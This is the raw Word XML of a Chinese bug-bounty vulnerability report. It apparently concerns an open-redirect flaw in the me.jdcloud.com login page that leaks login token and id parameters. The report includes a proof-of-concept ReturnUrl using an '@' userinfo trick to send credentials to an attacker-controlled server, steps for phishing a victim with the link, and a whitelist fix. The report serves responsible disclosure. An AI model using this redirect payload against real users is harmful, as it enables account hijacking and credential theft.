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8928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735BCA">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>京东某站存在账户劫持漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F25CB26" w14:textId="77777777" w:rsidR="00735BCA" w:rsidRPr="00735BCA" w:rsidRDefault="00735BCA" w:rsidP="00735BCA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BCA">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:pict w14:anchorId="2A4F9DD0">
          <v:rect id="_x0000_i1025" style="width:0;height:0" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="47EF6851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735BCA">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>漏洞类型</w:t>
      </w:r>
      <w:r w:rsidRPr="00735BCA">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>WEB漏洞—逻辑漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4681BA66" w14:textId="77777777" w:rsidR="00735BCA" w:rsidRPr="00735BCA" w:rsidRDefault="00735BCA" w:rsidP="00735BCA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BCA">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:pict w14:anchorId="4B66093B">
          <v:rect id="_x0000_i1026" style="width:0;height:0" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D8C620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735BCA">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>漏洞等级</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE5EA32" w14:textId="7997833D" w:rsidR="00735BCA" w:rsidRPr="00735BCA" w:rsidRDefault="00735BCA" w:rsidP="00735BCA">
      <w:pPr>
        <w:widowControl/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00735BCA">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:pict w14:anchorId="6A765C49">
          <v:rect id="_x0000_i1028" style="width:0;height:0" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="51565236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735BCA">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>漏洞详情</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="779CB77B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1、发现方式：请尽量详细填写，流程/步骤/截图/重现方法等</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5237F007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735BCA">
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
            <w:color w:val="337AB7"/>
            <w:kern w:val="0"/>
            <w:szCs w:val="21"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://me.jdcloud.com/passport/?ReturnUrl=https%3A%2F%2Fme.jdcloud.com@xxx.xxx.xxx.xxx%2Fadmin%2F&amp;clientId=824cd7bf40af4a2892e11d781533208f&amp;lang=null</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4700309B" w14:textId="54FC1795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9BF5D9F" wp14:editId="2F1F0B2A">
            <wp:extent cx="5274310" cy="2319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9202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访问页面登陆发现url参数携带跳转参数，随对其进行跳转测试，发现在跳转成功的同时，跳转到第三方页面会在请求中携带token和id两个参数,登录处存在URL跳转，这里可以利用这个跳转劫持登录用户的账户凭证</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06CF3F8E" w14:textId="49EFB6BF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D777554" wp14:editId="41C1FC10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E28E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9155B9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B9288E1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99DE14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2、漏洞证明：请在这里提供利用证明及POC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE983E7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Pr="00735BCA">
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
            <w:color w:val="337AB7"/>
            <w:kern w:val="0"/>
            <w:szCs w:val="21"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://me.jdcloud.com/passport/?ReturnUrl=https%3A%2F%2Fme.jdcloud.com@xxx.xxx.xxx.xxx%2Fadmin%2F&amp;clientId=824cd7bf40af4a2892e11d781533208f&amp;lang=null</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6575F834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这里搭配自己的服务器，完成劫持过程：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79BFC113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将跳转后的地址换成自己的服务器地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C5EDC1B" w14:textId="27BFFFE5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ADCE5D2" wp14:editId="11EF6345">
            <wp:extent cx="5274310" cy="488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C85B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通过vps上接收到参数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C92F04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1D6BEB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跳转的xxx.xxx.xxx.xxx需要提供https服务</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BC1EA72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将上面链接发送给用户，只要用户正常登录，服务器这边就能收到用户的登录凭证，可以通过收到的参数去登陆用户账户</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="294BC340" w14:textId="34B65F1A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76955A5" wp14:editId="41855FBB">
            <wp:extent cx="5274310" cy="2548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2BB1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因为无admin权限的账户</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B2EFD0B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所以登录成功显示这个页面</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74AE5D5E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040DF33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漏洞危害</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33BF91B4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735BCA">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>用户点击上面发送的ip链接就可以导致账户被攻击者登录利用任意的URL跳转的问题可以跳转到其他网站</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="574568A0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CBB1D8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727EA3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3、修复方案：您觉得靠谱的解决方案是什么？</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C7124E2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限制登录后的URL跳转范围，定义白名单.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA0BAA1" w14:textId="77777777" w:rsidR="00735BCA" w:rsidRPr="00735BCA" w:rsidRDefault="00735BCA" w:rsidP="00735BC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24AC19" w14:textId="77777777" w:rsidR="00735BCA" w:rsidRPr="00735BCA" w:rsidRDefault="00735BCA" w:rsidP="00735BCA">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:after="150"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00735BCA">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>注：一个完整的说明既能反映提交人的基础层次感也更有利于SRC的同学更快的处理漏洞，规范的报告还有机会获得漏洞加分哦~</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37981108" w14:textId="77777777" w:rsidR="00286BDA" w:rsidRDefault="00286BDA"/>
    <w:sectPr w:rsidR="00286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BE"/>
    <w:rsid w:val="00286BDA"/>
    <w:rsid w:val="00735BCA"/>
    <w:rsid w:val="00D1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9EFF"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{52AB7492-ED9E-4123-A96C-2254FEA2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35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85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32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3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534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me.jdcloud.com/passport/?ReturnUrl=https%3A%2F%2Fme.jdcloud.com.xyz%2Fadmin%2F&amp;clientId=824cd7bf40af4a2892e11d781533208f&amp;lang=n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e.jdcloud.com/passport/?ReturnUrl=https%3A%2F%2Fme.jdcloud.com@xxx.xxx.xxx.xxx%2Fadmin%2F&amp;clientId=824cd7bf40af4a2892e11d781533208f&amp;lang=nul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梁</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>捷 梁</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-11-28T08:46:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-11-28T08:47:00Z</dcterms:modified>
</cp:coreProperties>
</file>